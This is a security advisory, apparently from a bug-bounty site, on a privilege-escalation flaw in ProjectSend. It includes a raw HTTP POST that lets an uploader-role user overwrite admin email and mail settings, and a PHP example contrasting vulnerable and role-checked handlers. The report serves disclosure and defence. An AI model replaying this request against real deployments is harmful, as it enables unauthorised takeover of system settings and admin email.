Incorrect Privilege Assignment in projectsend/projectsend
Valid
Reported on
Jul 2nd 2021
💥 BUG
Privilege escalation bug that lets a low-privilege user update the admin email address, company name and other system settings.
💥 IMPACT
An unprivileged user can update the admin email address, company name and other system settings.
💥 STEP TO REPRODUCE
1. From the admin account, go to http://localhost/projectsend2/users.php and add a new user called user-B with the uploader role.
2. Now log in to the user-B account: there is no option to update the company name. user-B then sends the request below to update the company name and company email.
POST /projectsend2/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------22961416713886144272049413533
Content-Length: 1742
Origin: http://localhost
Connection: close
Referer: http://localhost/projectsend2/options.php?section=email
Cookie: PHPSESSID=c7uh0bkpk72ffue6lbbcbnmtjm;
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="csrf_token"
2295df1e93d7e67b6c756bb4157d54d82639238b35968e79261f9e180294d4b1
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="section"
email
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="admin_email_address"
admin@localhost.com
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_from_name"
bugbounty_by_user
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_copy_addresses"
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="notifications_max_tries"
2
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="notifications_max_days"
15
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_system_use"
mail
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_user"
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_pass"
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_host"
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_port"
-----------------------------22961416713886144272049413533
Content-Disposition: form-data; name="mail_smtp_auth"
none
-----------------------------22961416713886144272049413533--
In this request, replace the CSRF token with user-B's own CSRF token and forward the request through the Burp Suite interception tool; user-B can now change the company name, email address etc.
So user-B, with only the uploader role, can update the company name, email address etc.
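The root cause described above is an authorization check that is missing rather than one that is bypassed: the options handler verifies the session and the CSRF token but never compares the account's role against the roles allowed to change system settings. The following PHP is an added illustration, not ProjectSend's own code; session keys, role names and the allow-list are assumptions chosen to mirror the report.

```php
<?php
// Added example, not ProjectSend's own code. Models the flaw in the report:
// the options handler checks login and CSRF, but not the account's role, so an
// "uploader" can write admin-only settings. Session keys, role names and the
// allow-list below are assumptions for illustration.
declare(strict_types=1);

const ROLES_ALLOWED_TO_EDIT_OPTIONS = ['admin'];   // assumption: admins only
const EDITABLE_OPTIONS = ['admin_email_address', 'mail_from_name', 'mail_system_use'];

function loginAndCsrfOk(array $session, array $post): bool
{
    return !empty($session['user_id'])
        && hash_equals((string)($session['csrf_token'] ?? ''), (string)($post['csrf_token'] ?? ''));
}

/** Vulnerable flow: returns the option keys that would be saved for this request. */
function saveOptionsVulnerable(array $session, array $post): array
{
    if (!loginAndCsrfOk($session, $post)) {
        return [];
    }
    return array_values(array_intersect(array_keys($post), EDITABLE_OPTIONS));
}

/** Hardened flow: the role allow-list is enforced before anything is written. */
function saveOptionsHardened(array $session, array $post): array
{
    if (!loginAndCsrfOk($session, $post)) {
        return [];
    }
    if (!in_array($session['role'] ?? '', ROLES_ALLOWED_TO_EDIT_OPTIONS, true)) {
        // Deny and leave a trace: a non-admin posting to the options page is worth alerting on.
        error_log(sprintf('options: user %s (role %s) denied settings update',
            $session['user_id'], $session['role'] ?? 'none'));
        return [];
    }
    return array_values(array_intersect(array_keys($post), EDITABLE_OPTIONS));
}

// Constructed request: user-B (uploader role) submits the email-settings form
// with their own valid CSRF token, as in the report.
$sessionB = ['user_id' => 'user-B', 'role' => 'uploader', 'csrf_token' => 'tok-B'];
$postB = ['csrf_token' => 'tok-B', 'section' => 'email',
          'admin_email_address' => 'attacker-controlled@example.com',
          'mail_from_name' => 'bugbounty_by_user'];

echo "vulnerable saves: " . implode(', ', saveOptionsVulnerable($sessionB, $postB)) . PHP_EOL;
echo "hardened saves:   " . implode(', ', saveOptionsHardened($sessionB, $postB)) . PHP_EOL;
```

Run with `php example.php`: the vulnerable flow accepts both fields from user-B, while the hardened flow saves nothing and logs the denied attempt.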
We have contacted a member of the projectsend team and are waiting to hear back.